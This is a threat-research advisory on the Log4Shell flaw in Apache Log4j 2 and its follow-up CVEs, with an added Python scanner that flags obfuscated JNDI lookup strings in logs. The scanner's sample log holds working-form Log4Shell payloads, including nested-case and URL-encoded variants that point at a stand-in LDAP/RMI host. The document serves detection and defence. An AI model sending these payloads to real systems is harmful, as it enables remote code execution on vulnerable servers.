Anomali Threat Research: Apache Log4j 2 Vulnerability

A critical vulnerability, registered as CVE-2021-44228 (Log4Shell), has been identified in Apache Log4j 2, which is an open source Java package used to enable logging.[1] The vulnerability was discovered by Chen Zhaojun of Alibaba in late November 2021, reported to Apache, and subsequently released to the public on December 9, 2021.[2]

The Apache Software Foundation (ASF) rates CVE-2021-44228 as a 10 on the Common Vulnerability Scoring System (CVSS) scale.[3] Log4Shell is a remote code execution (RCE) vulnerability: Log4j evaluates lookup expressions embedded in the strings it logs, so attacker-controlled input that reaches a log statement (an HTTP header or form field, for example) can carry a JNDI lookup that the library resolves at logging time, a flaw the Elastic write-up describes as improper deserialization of user input.[4] Specifically, the vulnerability lies in Log4j's JNDI lookup support, most commonly abused through the LDAP provider.[5] A threat actor's objective is to trick JNDI into connecting to a threat actor-controlled directory service, which hands back a reference that causes the victim JVM to load and run the actor's code.[6] However, the exploitation reliability of Log4Shell depends on how the application uses the library and on the Java runtime it runs under.

  • Affected versions: Log4j 2.0-beta9 to 2.14.1
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Not required
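As an added illustration of the detection side (this is example code, not part of the original Anomali post or any Anomali product), the following Python scans log lines for the JNDI lookup pattern after undoing the obfuscation tricks seen in the wild: nested `${lower:}`/`${upper:}` lookups, the `${...:-default}` fallback syntax, and URL encoding in web server access logs. The log lines and IP addresses are constructed for the example. The rewrite loop is deliberately bounded, because unbounded lookup recursion is itself the denial-of-service condition tracked as CVE-2021-45105.

```python
"""Flag Log4Shell-style JNDI lookup strings in log lines, after undoing common obfuscation.

Constructed example; not Anomali code. Sample log lines and IP addresses are made up
(documentation ranges 192.0.2.0/24 and 198.51.100.0/24).
"""
import re
from urllib.parse import unquote

# Innermost Log4j lookups that attackers use to hide the literal "jndi":
#   ${lower:J} -> "j"     ${upper:j} -> "J"     ${::-j} or ${env:UNSET:-j} -> "j"
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{([^${}]*?):-([^${}]*)\}")
# The lookup prefix we actually care about, once the disguise is removed.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Cap the number of rewrite rounds: unbounded lookup recursion is itself a
# denial-of-service vector in Log4j (CVE-2021-45105), so do not mirror it here.
MAX_ROUNDS = 32


def _apply_case(m):
    return m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper()


def normalize(text):
    """Resolve nested case/default lookups so the true lookup prefix becomes visible."""
    text = unquote(text)  # access logs usually hold %24%7B rather than ${
    for _ in range(MAX_ROUNDS):
        rewritten = _CASE_LOOKUP.sub(_apply_case, text)
        rewritten = _DEFAULT_LOOKUP.sub(lambda m: m.group(2), rewritten)
        if rewritten == text:
            break
        text = rewritten
    return text


def is_jndi_lookup(line):
    """True if the line contains a JNDI lookup, possibly obfuscated or URL-encoded."""
    return _JNDI.search(normalize(line)) is not None


def scan(lines):
    """Return (line_number, normalized_line) for every line that carries a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        if is_jndi_lookup(line):
            hits.append((number, normalize(line)))
    return hits


# Constructed Apache-style access log excerpt: one benign request, three
# probes in increasing levels of obfuscation, and one non-JNDI lookup string.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://192.0.2.10:1389/a}"',
    '198.51.100.7 - - [10/Dec/2021:03:14:11 +0000] "GET /?q=${${lower:j}ndi:${lower:l}dap://192.0.2.10/a} HTTP/1.1" 400 0 "-" "-"',
    '198.51.100.7 - - [10/Dec/2021:03:14:12 +0000] "GET /%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A//192.0.2.10/a%7D HTTP/1.1" 404 0 "-" "-"',
    '198.51.100.7 - - [10/Dec/2021:03:14:13 +0000] "GET /docs/${sys:java.version} HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for number, shown in scan(SAMPLE_LOG):
        print(f"line {number}: {shown}")
```

Run against the constructed excerpt, lines 2, 3 and 4 are flagged and lines 1 and 5 are not. A stricter rule would alert on any `${` in request fields regardless of the lookup prefix; that catches probes this normalizer does not anticipate, at the cost of more false positives on applications that legitimately log template strings.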

Update: December 28, 2021

Overview

Another vulnerability, registered as CVE-2021-44832, was identified by Checkmarx researchers Yaniv Nizry and Liad Levy and released to the public on December 28, 2021.[7] Apache's initial description called it a remote code execution (RCE) vulnerability; Nizry, however, tweeted that it is better described as arbitrary code execution (ACE).[8] The distinction matters for exposure: an RCE such as Log4Shell can be triggered by an unauthenticated remote actor through the input the application logs, whereas this issue requires the actor to already have enough access to modify the Log4j configuration file, so that a JDBC Appender's DataSource element can be pointed at a JNDI URI under the actor's control. As of this writing, only the Checkmarx blog refers to CVE-2021-44832 solely as an ACE vulnerability, which requires an actor to already hold those permissions before the attack.[9]

CVE-2021-44832
  • Type: Arbitrary code execution (ACE) / RCE
  • Severity: Moderate
  • CVSS score: 6.6
  • Affected versions: 2.0-alpha7 to 2.17.0, excluding 2.3.2 and 2.12.4
  • NIST DOP (date of publication): December 28, 2021

Update: December 22, 2021

Three additional vulnerabilities related to the initial Log4Shell (CVE-2021-44228) vulnerability have been identified as security patches rolled out and threat actors familiarized themselves with this new attack vector. These vulnerabilities are:

CVE-2021-45046
  • Type: RCE
  • Severity: Critical
  • CVSS score: 9.0
  • Affected versions: 2.0-beta9 to 2.15.0, excluding 2.12.2
  • NIST DOP: December 14, 2021

CVE-2021-4104
  • Type: RCE
  • Severity: High
  • CVSS score: 8.1
  • Affected versions: Log4j 1.2
  • NIST DOP: December 14, 2021

CVE-2021-45105
  • Type: Denial-of-service
  • Severity: High
  • CVSS score: 7.5
  • Affected versions: 2.0-beta9 to 2.16.0, excluding 2.12.3
  • NIST DOP: December 18, 2021

How Anomali Can Help

Update: December 22, 2021

The Anomali Threat Research team has updated the previously-released ThreatStream dashboard “Log4Shell (CVE-2021-44228)” to include the related Log4j vulnerabilities. The updated dashboard title is “Log4Shell (CVE-2021-44228) and Variants: CVE-2021-45046, CVE-2021-45105, CVE-2021-4104, and CVE-2021-44832.” The dashboard can be used for tracking associated indicators, research articles and vulnerable products. Customers can use Anomali Integrator to block specific IOCs in their downstream security integrations.


Anomali Match can provide alerting and retrospective lookup capabilities to detect and contextualize matches for these indicators.

Anomali Log4Shell Dashboard

For more information, reach out to your Customer Success Manager.

Endnotes

[1] “CVE-2021-44228 Detail,” NVD NIST, accessed December 13, 2021, published December 10, 2021, https://nvd.nist.gov/vuln/detail/CVE-2021-44228; Free Wortley, et al., “Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package,” LunaSec, accessed December 13, 2021, published December 12, 2021, https://www.lunasec.io/docs/blog/log4j-zero-day/.

[2] Dan Goodin, "Zero-day in ubiquitous Log4j tool poses a grave threat to the Internet," Ars Technica, accessed December 28, 2021, published December 9, 2021, https://arstechnica.com/information-technology/2021/12/minecraft-and-other-apps-face-serious-threat-from-new-code-execution-bug/; Jake King and Samir Bousseaden, “Detecting Exploitation of CVE-2021-44228 (log4j2) with Elastic Security,” Elastic NV, accessed December 13, 2021, published December 10, 2021, https://www.elastic.co/blog/detecting-log4j2-with-elastic-security.

[3] “CVE-2021-44228 Detail,” NVD NIST.

[4] Jake King and Samir Bousseaden, “Detecting Exploitation of CVE-2021-44228 (log4j2) with Elastic Security,” Elastic NV.

[5] “Threat Advisory: Critical Apache Log4j vulnerability being exploited in the wild,” Cisco Talos Blog, accessed December 13, 2021, published December 10, 2021, https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html.

[6] Hans-Martin Münch, “VULNERABILITY NOTES: LOG4SHELL,” Mogwai Labs, accessed December 13, 2021, published December 10, 2021, https://mogwailabs.de/en/blog/2021/12/vulnerability-notes-log4shell/?s=09.

[7] Yaniv Nizry, “Stay tuned for a blog post…,” Twitter, accessed December 28, 2021, published December 28, 2021, https://twitter.com/YNizry/status/1475916671953117184; “Apache Log4j Security Vulnerabilities,” Apache, accessed December 22, 2021, published December 17, 2021, https://logging.apache.org/log4j/2.x/security.html.

[8] Yaniv Nizry, “Stay tuned for a blog post…,” Twitter.

[9] Yaniv Nizry and Liad Levy, “CVE-2021-44832 - APACHE LOG4J 2.17.0 ARBITRARY CODE EXECUTION VIA JDBCAPPENDER DATASOURCE ELEMENT,” Checkmarx Blog, accessed December 28, 2021, published December 28, 2021, https://checkmarx.com/blog/cve-2021-44832-apache-log4j-2-17-0-arbitrary-code-execution-via-jdbcappender-datasource-element/.
